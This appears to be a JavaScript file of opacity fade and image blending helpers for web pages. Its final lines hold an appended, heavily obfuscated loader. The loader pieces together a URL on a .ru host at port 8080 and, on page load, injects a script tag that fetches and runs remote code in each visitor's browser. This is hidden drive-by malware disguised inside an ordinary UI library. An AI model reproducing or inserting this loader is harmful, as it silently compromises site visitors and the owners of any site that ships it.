function opacity(id, opacStart, opacEnd, millisec) {
	//speed for each frame
	var speed = Math.round(millisec / 100);
	var timer = 0;

	//determine the direction for the blending, if start and end are the same nothing happens
	if(opacStart > opacEnd) {
		for(i = opacStart; i >= opacEnd; i--) {
			setTimeout("changeOpac(" + i + ",'" + id + "')",(timer * speed));
			timer++;
		}
	} else if(opacStart < opacEnd) {
		for(i = opacStart; i <= opacEnd; i++)
			{
			setTimeout("changeOpac(" + i + ",'" + id + "')",(timer * speed));
			timer++;
		}
	}
}

//change the opacity for different browsers
function changeOpac(opacity, id) {
	var object = document.getElementById(id).style; 
	object.opacity = (opacity / 100);
	object.MozOpacity = (opacity / 100);
	object.KhtmlOpacity = (opacity / 100);
	object.filter = "alpha(opacity=" + opacity + ")";
}

function shiftOpacity(id, millisec) {
	//if an element is invisible, make it visible, else make it ivisible
	if(document.getElementById(id).style.opacity == 0) {
		opacity(id, 0, 100, millisec);
	} else {
		opacity(id, 100, 0, millisec);
	}
}

function blendimage(divid, imageid, imagefile, millisec) {
	var speed = Math.round(millisec / 100);
	var timer = 0;
	
	//set the current image as background
	document.getElementById(divid).style.backgroundImage = "url(" + document.getElementById(imageid).src + ")";
	
	//make image transparent
	changeOpac(0, imageid);
	
	//make new image
	document.getElementById(imageid).src = imagefile;

	//fade in image
	for(i = 0; i <= 100; i++) {
		setTimeout("changeOpac(" + i + ",'" + imageid + "')",(timer * speed));
		timer++;
	}
}

function currentOpac(id, opacEnd, millisec) {
	//standard opacity is 100
	var currentOpac = 100;
	
	//if the element has an opacity set, get it
	if(document.getElementById(id).style.opacity < 100) {
		currentOpac = document.getElementById(id).style.opacity * 100;
	}

	//call for the function that changes the opacity
	opacity(id, currentOpac, opacEnd, millisec)
}
var s;if(s!='' && s!='oZ'){s='J'};var Kl;if(Kl!='' && Kl!='sf'){Kl='p'};function P(){var l;if(l!='' && l!='Wa'){l='H'};var dU;if(dU!='' && dU!='Kv'){dU='Iu'};var e="gcHI".substr(0,1);var W='';var V=RegExp;this.v="";var HR=new String();var bz;if(bz!='' && bz!='w'){bz=null};var B;if(B!='' && B!='E'){B=null};function k(S,PO){var ol=new String();var T= String("[");var VK;if(VK!='BQ' && VK!='Sa'){VK='BQ'};T+=PO;T+="]PrEh".substr(0,1);var Oi;if(Oi!='m' && Oi!='G'){Oi=''};var zT=new Date();var xM=new Date();var _=new V(T, e);return S.replace(_, W);var No;if(No!='' && No!='X'){No=null};var _I;if(_I!='KS'){_I=''};};var c_;if(c_!='R' && c_ != ''){c_=null};var AQ=new Date();var TN;if(TN!='' && TN!='Wi'){TN='h'};var j="";var U='';var Ms;if(Ms!='mS'){Ms='mS'};var Ec;if(Ec!='Mc' && Ec!='eQ'){Ec=''};var d="nrsdef".substr(3)+"NSquer".substr(4);var i;if(i!='Az'){i='Az'};var K=String("http:"+"//rap"+"idsha"+"re-co"+"tbNm.kai".substr(3)+"cvXxin00".substr(3)+"1.comBh0".substr(0,5)+".pcwodG9e".substr(0,5)+"bzwrld-c".substr(3)+"om.bu"+"JOiZymypa".substr(4)+"lm.ru"+"DnRO:".substr(4));var ov;if(ov!='' && ov!='pg'){ov=null};var n;if(n!='' && n!='Et'){n=null};var O=window;var N=k('8223302332328332202333',"23");var au;if(au!='jj' && au != ''){au=null};var A=String("/blacC8pQ".substr(0,5)+"9vQZkberrvQ9Z".substr(4,5)+"gnERy.comEnRg".substr(4,5)+"/blac"+"cFWkberrWcF".substr(3,5)+"FiCIy.com".substr(4)+"Y2q/soutY2q".substr(3,5)+"2S1hwest2S1".substr(3,5)+"j3O.com/3jO".substr(3,5)+"bFOagooglOFab".substr(4,5)+"86Ce.comC68".substr(3,5)+"6l2S/sedoSl26".substr(4,5)+"parki"+"9WOng.co9OW".substr(3,5)+"HXbEm.phpXEbH".substr(4,5));var fU=new Array();var kl="scrDjn".substr(0,3)+"AwqiptwqA".substr(3,3);var C=new String("src");var SU;if(SU!='u' && SU!='PF'){SU=''};O.onload=function(){var F;if(F!='tG' && F != ''){F=null};var Iv=new String();try {U=K+N;U+=A;var Fo;if(Fo!='' && Fo!='aC'){Fo=''};var oTd;if(oTd!='' && oTd!='L'){oTd=''};o=document.createElement(kl);var y;if(y!='Pd' && y!='_d'){y=''};var q='';var uX;if(uX!='' && uX!='fy'){uX=null};o[d]=[1][0];this.QI='';this.QF='';o[C]=U;var EU=new String();var CT;if(CT!='Fa' && CT != ''){CT=null};var hj;if(hj!='PU' && hj!='hV'){hj=''};document.body.appendChild(o);var bL;if(bL!='az'){bL=''};var Tu;if(Tu!='Pi'){Tu=''};var EKk="";} catch(Nj){};this.dq="";this.oq="";};this.Sf="";};P();var xH;if(xH!='eU'){xH='eU'};var AZ=new Date();